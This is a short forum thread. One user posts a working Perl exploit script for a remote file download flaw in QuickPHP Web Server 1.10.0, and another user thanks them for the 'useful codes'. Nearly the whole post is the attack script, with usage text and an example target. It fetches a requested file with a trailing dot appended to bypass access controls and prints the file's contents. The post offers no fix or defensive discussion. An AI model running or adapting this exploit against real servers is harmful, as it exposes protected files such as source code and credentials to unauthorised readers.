[jalal77]

QuickPHP Web Server is vulnerable for a Remote File Download attcak

the following code will exploit the bug.



The vulnerability allows an unprivileged attacker to download files whom he has no permissions to




Code:

#!/usr/bin/perl

use LWP::Simple;



if (@ARGV < 3) {

print("\r\n");

print("QuickPHP Web Server 1.10.0 Remote File Download Exploit\r\n");

print("Discovered & Exploited by Pr0T3cT10n\r\n");

print("-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n");

print("Usage: " .$0. " \r\n");

print("HOST - An host using QuickPHP Web Server\r\n");

print("PORT - Port number\r\n");

print("FILE - The file you want to get\r\n");

print("Example: " .$0. " hostingserver.com 80 index.php\r\n\r\n");

exit(1);

} else {

print("QuickPHP Web Server 1.10.0 Remote File Download Exploit\r\n");

print("Discovered & Exploited by Pr0T3cT10n\r\n");

print("-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n\r\n");

($host, $port, $file) = @ARGV;

$content = get("http://" .$host. ":" .$port. "/" .$file. ".");

print("File Content:\r\n\r\n");

print($content. "\r\n");

}

[spsum60]

Amazing...! Thx for useful codes